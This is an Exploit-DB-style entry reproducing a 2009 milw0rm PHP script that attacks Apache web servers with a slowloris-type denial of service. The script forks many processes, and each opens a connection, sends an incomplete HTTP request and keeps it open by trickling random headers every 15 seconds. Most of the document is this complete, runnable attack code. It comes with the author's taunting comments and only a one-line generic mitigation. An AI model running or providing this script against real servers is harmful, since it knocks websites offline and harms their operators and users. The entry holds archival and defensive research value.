DOS for the vulnerability

vendor:

N/A

by:

evilrabbi b4b0

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A PHP script to attack Apache webservers by creating multiple processes and sending random requests to the webserver. This exploit was written by evilrabbi b4b0 and was published on milw0rm.com in 2009.

Mitigation:

Ensure that the webserver is configured to handle a large number of requests and is not vulnerable to DoS attacks.

Source

Exploit-DB raw data:

<?php
/*
    DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601
   

    I wrote it in PHP because I find it funny to make PHP attack apache...
    I set it at 200 processes and it kill my test servers pretty quick. have fun kiddiez...

    greetz: m1m1, t4dp0le, p00kiep0x, global hell [gH], b4b0, ri0t, JxT, bastard labs, neonfreon and everyone else you know who you are.....
    --evilrabbi b4b0
*/
/**
 * Usage function...
 *
 * @param $argv array
 * @return void
 */
function usage($argv)
{
    print "Usage: php ./{$argv[0]} <number of processes> <webserver ip or hostname>\n";
    die();
}

/**
 * Hangs the connection to the webserver
 *
 * @param $server string
 * @return void
 */
function killTheFucker($server)
{
    $request  = "GET / HTTP/1.1\r\n";
    $request .= "Host: {$server}\r\n";
    $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
    $request .= "Content-Length: " . rand(1, 1000) . "\r\n";
    $request .= "X-a: " . rand(1, 10000) . "\r\n";

    $sockfd = @fsockopen($server, 80, $errno, $errstr);
    @fwrite($sockfd, $request);

    while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE)
    {
        sleep(15);
    }
   
   
}

/**
 * main function
 * @param $argc int
 * @param $argv array
 * @return void
 */
function main($argc, $argv)
{
    $status = 1;

    if ($argc < 3)
    {
        usage($argv);
    }

    $pids = Array();

    for ($i = 0; $i < $argv[1]; $i++)
    {
        $pid = pcntl_fork();

        if ($pid == -1)
        {
            die("ERROR!@# YOU MADE BABY JESUS CRY");
        }
        else if ($pid == 0)
        {
            killTheFucker($argv[2]);
            exit(0);
        }
        else
        {
            $pids[] = $pid;
        }
    }

    foreach ($pids as $pid)
    {
        pcntl_waitpid($pid, $status);
    }
}

// fire everything up
main($argc, $argv);

# milw0rm.com [2009-06-22]